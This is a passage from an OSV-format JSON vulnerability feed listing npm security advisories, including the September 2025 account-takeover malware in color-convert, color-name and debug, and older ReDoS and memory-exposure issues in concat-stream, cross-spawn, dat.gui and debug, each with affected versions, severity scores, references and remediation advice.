"database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-pxx3-g568-hxr4/GHSA-pxx3-g568-hxr4.json" } } ], "references": [ { "type": "WEB", "url": 
"https://github.com/Qix-/color-convert/security/advisories/GHSA-pxx3-g568-hxr4" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59162" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/issues/1005" }, { "type": "PACKAGE", "url": "https://github.com/Qix-/color-convert" }, { "type": "WEB", "url": "https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack" }, { "type": "WEB", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "WEB", "url": "https://www.ox.security/blog/npm-packages-compromised" } ], "database_specific": { "cwe_ids": [ "CWE-506" ], "github_reviewed": true, "github_reviewed_at": "2025-09-15T23:32:36Z", "nvd_published_at": "2025-09-15T20:15:39Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/U:Red" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46971", "published": "2025-09-08T15:20:15Z", "modified": "2025-09-16T06:44:36.975424Z", "aliases": [ "CVE-2025-59162", "GHSA-ch7m-m9rf-8gvv", "GHSA-pxx3-g568-hxr4" ], "summary": "Malicious code in color-convert (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (71ee3370ed9cf22bf89fbf40c954408a6ddcd17fbd38750027a2b7fab6034bce)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. 
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "color-convert", "ecosystem": "npm", "purl": "pkg:npm/color-convert" }, "versions": [ "3.1.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/color-convert/MAL-2025-46971.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/issues/6099" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-ch7m-m9rf-8gvv" }, { "type": "WEB", "url": "https://github.com/Qix-/color-convert/security/advisories/GHSA-pxx3-g568-hxr4" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-09T00:35:48.409407322Z", "modified_time": "2025-09-08T17:56:12Z", "sha256": "71ee3370ed9cf22bf89fbf40c954408a6ddcd17fbd38750027a2b7fab6034bce", "source": "ghsa-malware", "versions": [ "3.1.1" ] }, { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-10T00:34:05.222333023Z", "modified_time": "2025-09-08T17:56:12Z", "sha256": "ee95040e7382c445c5a1de4f66c3aed2bd1c73e1c57e6c1f771a7533ede4f69f", "source": "ghsa-malware", "versions": [ "3.1.1" ] }, { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-11T00:34:35.466556711Z", "modified_time": "2025-09-10T17:52:03Z", "sha256": "1e49d335bbdf3413c7efa2126f2e06bb7533e83ab6f365d579dbe20b0ae30be9", "source": 
"ghsa-malware", "versions": [ "3.1.1" ] }, { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-12T00:33:58.055781098Z", "modified_time": "2025-09-10T17:52:03Z", "sha256": "36c2dcaa1b9cf1e9b5ec230c48ee34687bbd9bea0c1f91efbfbf650557267927", "source": "ghsa-malware", "versions": [ "3.1.1" ] }, { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-16T00:34:25.618299208Z", "modified_time": "2025-09-15T23:53:52Z", "sha256": "b4461cfdaf22dc82a9f42a461cfb5010106609d3e678ca21a5ec688a726ccabd", "source": "ghsa-malware", "versions": [ "3.1.1" ] }, { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-17T00:07:09.294375031Z", "modified_time": "2025-09-15T23:53:52Z", "sha256": "38db2d19b1ffae2a528090f28216d7c84e2ab97ed2867873e8e2bce73367dd1d", "source": "ghsa-malware", "versions": [ "3.1.1" ] }, { "id": "GHSA-ch7m-m9rf-8gvv", "import_time": "2025-09-17T00:34:59.136200926Z", "modified_time": "2025-09-15T23:53:52Z", "sha256": "801c40de46a1c5af84767ee6b828fad2b331674b3430948a4f75bda351040f8f", "source": "ghsa-malware", "versions": [ "3.1.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5fvm-p68v-5wmh", "published": "2025-09-15T22:03:28Z", "modified": "2025-09-16T06:44:30.196915Z", "aliases": [ "CVE-2025-59145", "GHSA-m99c-cfww-cxqx", "MAL-2025-46972" ], "summary": "color-name@2.0.1 contains malware after npm account takeover", "details": "### Impact\nOn 8 September 2025, an npm publishing account for `color-name` was taken over after a phishing attack. Version `2.0.1` was published, functionally identical to the previous patch version, but with a malware payload added attempting to redirect cryptocurrency transactions to the attacker's own addresses from within browser environments.\n\nLocal environments, server environments, command line applications, etc. are not affected. If the package was used in a browser context (e.g. 
a direct `\u003cscript\u003e` inclusion, or via a bundling tool such as Babel, Rollup, Vite, Next.js, etc.) there is a chance the malware still exists and such bundles will need to be rebuilt.\n\nThe malware seemingly only targets cryptocurrency transactions and wallets such as MetaMask. See references below for more information on the payload.\n\n### Patches\nnpm removed the offending package from the registry over the course of the day on 8 September, preventing further downloads from npm proper.\n\nOn 13 September, the package owner published new patch versions to help cache-bust those using private registries who might still have the compromised version cached. This version is functionally identical to the previously known-good version, published as a patch version bump above the compromised version.\n\nUsers should update to the latest patch version, completely remove their `node_modules` directory, clean their package manager's global cache, and rebuild any browser bundles from scratch.\n\nThose operating private registries or registry mirrors should purge the offending versions from any caches.\n\n### Resources\n- https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised\n- https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack\n- https://www.ox.security/blog/npm-packages-compromised/\n\n### Point of Contact\nIn the event suspicious behavior is still observed for the package listed in this security advisory after performing all of the above cleaning operations (see _Patches_ above), please reach out via one of the following channels of communication:\n\n- Bluesky, compromised publishing account owner: https://bsky.app/profile/bad-at-computer.bsky.social\n- `debug` repository, tracking issue (applies to all packages affected in the breach): https://github.com/debug-js/debug/issues/1005", "affected": [ { "package": { "name": "color-name", "ecosystem": "npm", "purl": "pkg:npm/color-name" }, "ranges": [ { "type": "SEMVER", 
"events": [ { "introduced": "2.0.1" }, { "fixed": "2.0.2" } ] } ], "versions": [ "2.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-5fvm-p68v-5wmh/GHSA-5fvm-p68v-5wmh.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/colorjs/color-name/security/advisories/GHSA-5fvm-p68v-5wmh" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59145" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/issues/1005" }, { "type": "PACKAGE", "url": "https://github.com/colorjs/color-name" }, { "type": "WEB", "url": "https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack" }, { "type": "WEB", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "WEB", "url": "https://www.ox.security/blog/npm-packages-compromised" } ], "database_specific": { "cwe_ids": [ "CWE-506" ], "github_reviewed": true, "github_reviewed_at": "2025-09-15T22:03:28Z", "nvd_published_at": "2025-09-15T21:15:36Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/U:Red" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46972", "published": "2025-09-08T15:05:16Z", "modified": "2025-09-16T06:44:30.196915Z", "aliases": [ "CVE-2025-59145", "GHSA-5fvm-p68v-5wmh", "GHSA-m99c-cfww-cxqx" ], "summary": "Malicious code in color-name (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (ec95d0b2e67387181db7dbe2f93160248e40a3f6323ef1ee75b116f621ac5af1)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. 
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "color-name", "ecosystem": "npm", "purl": "pkg:npm/color-name" }, "versions": [ "2.0.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/color-name/MAL-2025-46972.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/issues/6099" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-m99c-cfww-cxqx" }, { "type": "WEB", "url": "https://github.com/colorjs/color-name/security/advisories/GHSA-5fvm-p68v-5wmh" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-09T00:35:48.415723474Z", "modified_time": "2025-09-08T18:02:51Z", "sha256": "ec95d0b2e67387181db7dbe2f93160248e40a3f6323ef1ee75b116f621ac5af1", "source": "ghsa-malware", "versions": [ "2.0.1" ] }, { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-10T00:34:05.231153986Z", "modified_time": "2025-09-08T18:02:51Z", "sha256": "928233225e28998e4fe7121fe96ac87179542253c82b34e02a3bc10e5e49c922", "source": "ghsa-malware", "versions": [ "2.0.1" ] }, { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-11T00:34:35.476356878Z", "modified_time": "2025-09-10T17:48:44Z", "sha256": "9c1bfc8bf637d2f2fe25386bba4164441b0432ed54331595e9e305d9e95e132a", "source": "ghsa-malware", 
"versions": [ "2.0.1" ] }, { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-12T00:33:58.086126601Z", "modified_time": "2025-09-10T17:48:44Z", "sha256": "f2cc960d02e1a3cc2e1b07650f63addf01114600f7e7615bddb85a3bbd89cf4b", "source": "ghsa-malware", "versions": [ "2.0.1" ] }, { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-16T00:34:25.640454724Z", "modified_time": "2025-09-15T23:56:12Z", "sha256": "b3b6aa6b1f5d027c077a05ae6b1071b92f602f0e2261ef295c2e64f73d437596", "source": "ghsa-malware", "versions": [ "2.0.1" ] }, { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-17T00:07:09.351618297Z", "modified_time": "2025-09-15T23:56:12Z", "sha256": "67cc1bbf808d890c505325e050d1996eb83ff0ae161bfe6aab545da645e58aaf", "source": "ghsa-malware", "versions": [ "2.0.1" ] }, { "id": "GHSA-m99c-cfww-cxqx", "import_time": "2025-09-17T00:34:59.207984541Z", "modified_time": "2025-09-15T23:56:12Z", "sha256": "d4d3f83b21a80fbd745a6085a0ca1a103b9648524da94ebe8d8c21d30e86e607", "source": "ghsa-malware", "versions": [ "2.0.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g74r-ffvr-5q9f", "published": "2019-06-03T17:26:44Z", "modified": "2020-08-31T18:29:17Z", "summary": "Memory Exposure in concat-stream", "details": "Versions of `concat-stream` before 1.5.2 are vulnerable to memory exposure if user provided input is passed into `write()`\n\nVersions \u003c1.3.0 are not affected due to not using unguarded Buffer constructor.\n\n\n\n## Recommendation\n\nUpdate to version 1.5.2, 1.4.11, 1.3.2 or later.\n\nIf you are unable to update make sure user provided input into the `write()` function is not a number.", "affected": [ { "package": { "name": "concat-stream", "ecosystem": "npm", "purl": "pkg:npm/concat-stream" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.5.0" }, { "fixed": "1.5.2" } ] } ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-g74r-ffvr-5q9f/GHSA-g74r-ffvr-5q9f.json" } }, { "package": { "name": "concat-stream", "ecosystem": "npm", "purl": "pkg:npm/concat-stream" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.4.0" }, { "fixed": "1.4.11" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-g74r-ffvr-5q9f/GHSA-g74r-ffvr-5q9f.json" } }, { "package": { "name": "concat-stream", "ecosystem": "npm", "purl": "pkg:npm/concat-stream" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.3.0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-g74r-ffvr-5q9f/GHSA-g74r-ffvr-5q9f.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/maxogden/concat-stream/pull/47" }, { "type": "WEB", "url": "https://github.com/maxogden/concat-stream/pull/47/commits/3e285ba5e5b10b7c98552217f5c1023829efe69e" }, { "type": "WEB", "url": "https://gist.github.com/ChALkeR/c2d2fd3f1d72d51ad883df195be03a85" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/597" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2019-06-03T17:26:24Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-3xgq-45jj-v275", "published": "2024-11-08T06:30:47Z", "modified": "2025-05-19T19:56:26Z", "aliases": [ "CVE-2024-21538" ], "related": [ "CGA-3wmj-q542-x56g", "CGA-49x5-fp72-pvgg", "CGA-56f7-wq2j-gqhc", "CGA-58mw-hm95-x9xv", "CGA-7c7p-r8cv-2pj4", "CGA-8hpc-g49m-34cc", "CGA-8j64-28x2-ggxv", "CGA-8rv2-6965-grc6", "CGA-m347-mh8c-rhf4" ], "summary": "Regular Expression Denial of Service (ReDoS) in cross-spawn", "details": "Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of 
Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.", "affected": [ { "package": { "name": "cross-spawn", "ecosystem": "npm", "purl": "pkg:npm/cross-spawn" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-3xgq-45jj-v275/GHSA-3xgq-45jj-v275.json" } }, { "package": { "name": "cross-spawn", "ecosystem": "npm", "purl": "pkg:npm/cross-spawn" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "6.0.6" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-3xgq-45jj-v275/GHSA-3xgq-45jj-v275.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21538" }, { "type": "WEB", "url": "https://github.com/moxystudio/node-cross-spawn/issues/165" }, { "type": "WEB", "url": "https://github.com/moxystudio/node-cross-spawn/pull/160" }, { "type": "WEB", "url": "https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff" }, { "type": "WEB", "url": "https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f" }, { "type": "WEB", "url": "https://github.com/moxystudio/node-cross-spawn/commit/d35c865b877d2f9ded7c1ed87521c2fdb689c8dd" }, { "type": "PACKAGE", "url": "https://github.com/moxystudio/node-cross-spawn" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-8366349" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-CROSSSPAWN-8303230" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2024-11-15T22:25:53Z", "nvd_published_at": "2024-11-08T05:15:06Z", "severity": "HIGH" }, 
"severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" } ] }, { "schema_version": "1.7.3", "id": "GHSA-chwr-hf3w-c984", "published": "2021-05-10T18:44:38Z", "modified": "2023-11-08T04:04:08.690471Z", "aliases": [ "CVE-2020-7755" ], "summary": "Regular Expression Denial of Service in dat.gui", "details": "All versions of package dat.gui are vulnerable to Regular Expression Denial of Service (ReDoS) via specifically crafted rgb and rgba values.", "affected": [ { "package": { "name": "dat.gui", "ecosystem": "npm", "purl": "pkg:npm/dat.gui" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "0.7.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-chwr-hf3w-c984/GHSA-chwr-hf3w-c984.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7755" }, { "type": "WEB", "url": "https://github.com/dataarts/dat.gui/issues/278" }, { "type": "WEB", "url": "https://github.com/dataarts/dat.gui/pull/279" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-DATGUI-1016275" }, { "type": "WEB", "url": "https://www.npmjs.com/package/dat.gui" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-04-21T17:36:43Z", "nvd_published_at": "2020-10-27T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4x49-vf9v-38px", "published": "2025-09-15T21:30:55Z", "modified": "2025-09-16T06:44:36.384185Z", "aliases": [ "CVE-2025-59144", "GHSA-8mgj-vmr8-frr6", "MAL-2025-46974" ], "summary": "debug@4.4.2 contains malware after npm account takeover", "details": "### Impact\nOn 8 September 2025, the npm publishing account for 
`debug` was taken over after a phishing attack. Version `4.4.2` was published, functionally identical to the previous patch version, but with a malware payload added attempting to redirect cryptocurrency transactions to the attacker's own addresses from within browser environments.\n\nLocal environments, server environments, command line applications, etc. are not affected. If the package was used in a browser context (e.g. a direct `\u003cscript\u003e` inclusion, or via a bundling tool such as Babel, Rollup, Vite, Next.js, etc.) there is a chance the malware still exists and such bundles will need to be rebuilt.\n\nThe malware seemingly only targets cryptocurrency transactions and wallets such as MetaMask. See references below for more information on the payload.\n\n### Patches\nnpm removed the offending package from the registry over the course of the day on 8 September, preventing further downloads from npm proper.\n\nOn 13 September, the package owner published new patch versions to help cache-bust those using private registries who might still have the compromised version cached. 
This version is functionally identical to the previously known-good version, published as a patch version bump above the compromised version.\n\nUsers should upgrade to the latest patch version, completely remove their `node_modules` directory, clean their package manager's global cache, and rebuild any browser bundles from scratch.\n\nThose operating private registries or registry mirrors should purge the offending versions from any caches.\n\n### References\n- https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised\n- https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack\n- https://www.ox.security/blog/npm-packages-compromised/\n\n### Point of Contact\nIn the event suspicious behavior is still observed for the package listed in this security advisory after performing all of the above cleaning operations (see _Patches_ above), please reach out via one of the following channels of communication:\n\n- Bluesky, package owner: https://bsky.app/profile/bad-at-computer.bsky.social\n- `debug` repository, tracking issue (applies to all packages affected in the breach): https://github.com/debug-js/debug/issues/1005", "affected": [ { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.4.2" }, { "fixed": "4.4.3" } ] } ], "versions": [ "4.4.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-4x49-vf9v-38px/GHSA-4x49-vf9v-38px.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/debug-js/debug/security/advisories/GHSA-4x49-vf9v-38px" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59144" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/issues/1005" }, { "type": "PACKAGE", "url": "https://github.com/debug-js/debug" }, { "type": "WEB", "url": 
"https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack" }, { "type": "WEB", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "WEB", "url": "https://www.ox.security/blog/npm-packages-compromised" } ], "database_specific": { "cwe_ids": [ "CWE-506" ], "github_reviewed": true, "github_reviewed_at": "2025-09-15T21:30:55Z", "nvd_published_at": "2025-09-15T20:15:39Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/U:Red" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9vvw-cc9w-f27h", "published": "2023-01-09T12:30:19Z", "modified": "2023-11-08T03:59:17.780578Z", "aliases": [ "CVE-2017-20165" ], "summary": "debug Inefficient Regular Expression Complexity vulnerability", "details": "A vulnerability classified as problematic has been found in debug-js debug up to 3.0.x. This affects the function useColors of the file src/node.js. The manipulation of the argument str leads to inefficient regular expression complexity. Upgrading to version 3.1.0 is able to address this issue. The name of the patch is c38a0166c266a679c8de012d4eaccec3f944e685. It is recommended to upgrade the affected component. The identifier VDB-217665 was assigned to this vulnerability. 
The patch has been backported to the 2.6.x branch in version 2.6.9.", "affected": [ { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-9vvw-cc9w-f27h/GHSA-9vvw-cc9w-f27h.json" } }, { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.6.9" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-9vvw-cc9w-f27h/GHSA-9vvw-cc9w-f27h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20165" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/pull/504" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/commit/c38a0166c266a679c8de012d4eaccec3f944e685" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/commit/f53962e944a87e6ca9bb622a2a12dffc22a9bb5a" }, { "type": "PACKAGE", "url": "https://github.com/debug-js/debug" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/releases/tag/2.6.9" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/releases/tag/3.1.0" }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.217665" }, { "type": "WEB", "url": "https://vuldb.com/?id.217665" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2023-01-10T21:49:01Z", "nvd_published_at": "2023-01-09T10:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gxpj-cx7g-858c", "published": "2018-08-09T20:18:07Z", "modified": "2024-03-25T19:01:23Z", "aliases": [ "CVE-2017-16137" ], "related": [ 
"CGA-j9cp-p46h-5p44" ], "summary": "Regular Expression Denial of Service in debug", "details": "Affected versions of `debug` are vulnerable to regular expression denial of service when untrusted user input is passed into the `o` formatter. \n\nAs it takes 50,000 characters to block the event loop for 2 seconds, this issue is a low severity issue.\n\nThis was later re-introduced in version v3.2.0, and then repatched in versions 3.2.7 and 4.3.1.\n\n## Recommendation\n\nVersion 2.x.x: Update to version 2.6.9 or later.\nVersion 3.1.x: Update to version 3.1.0 or later.\nVersion 3.2.x: Update to version 3.2.7 or later.\nVersion 4.x.x: Update to version 4.3.1 or later.", "affected": [ { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.6.9" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/08/GHSA-gxpj-cx7g-858c/GHSA-gxpj-cx7g-858c.json" } }, { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/08/GHSA-gxpj-cx7g-858c/GHSA-gxpj-cx7g-858c.json" } }, { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.2.0" }, { "fixed": "3.2.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/08/GHSA-gxpj-cx7g-858c/GHSA-gxpj-cx7g-858c.json" } }, { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.3.1" } ] } ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/08/GHSA-gxpj-cx7g-858c/GHSA-gxpj-cx7g-858c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16137" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/issues/797" }, { "type": "WEB", "url": "https://github.com/visionmedia/debug/issues/501" }, { "type": "WEB", "url": "https://github.com/visionmedia/debug/pull/504" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/commit/4e2150207c568adb9ead8f4c4528016081c88020" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/commit/71169065b5262f9858ac78cc0b688c84a438f290" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/commit/b6d12fdbc63b483e5c969da33ea6adc09946b5ac" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/commit/f53962e944a87e6ca9bb622a2a12dffc22a9bb5a" }, { "type": "PACKAGE", "url": "https://github.com/visionmedia/debug" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8ba4c628fba7181af58817d452119481adce4ba92e889c643e4c7dd3@%3Ccommits.netbeans.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5ac16fad337d1f3bb7079549f97d8166d0ef3082629417c39f12d63@%3Cnotifications.netbeans.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:38:18Z", "nvd_published_at": null, "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46974", "published": "2025-09-08T14:26:51Z", "modified": "2025-09-16T06:44:36.384185Z", "aliases": [ "CVE-2025-59144", "GHSA-4x49-vf9v-38px", "GHSA-8mgj-vmr8-frr6" ], "summary": "Malicious code in debug (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. 
Do not edit below this line.=-_\n\n## Source: ghsa-malware (558d1dda312e85212121f4ed15340349f780f5e40d6685c3687648bbb2924381)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "versions": [ "4.4.2" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/debug/MAL-2025-46974.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { 